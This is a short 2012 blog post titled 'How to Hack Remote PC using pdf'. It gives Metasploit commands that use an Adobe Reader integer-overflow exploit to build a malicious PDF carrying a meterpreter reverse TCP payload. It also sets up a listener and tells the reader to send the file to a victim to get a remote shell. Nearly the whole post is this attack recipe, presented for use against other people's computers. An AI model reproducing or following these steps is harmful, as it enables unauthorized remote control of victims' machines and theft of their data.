Saturday, September 29, 2012

How to Hack Remote PC using pdf

1:36 AM  , ,  No comments

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement

Attacker: metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)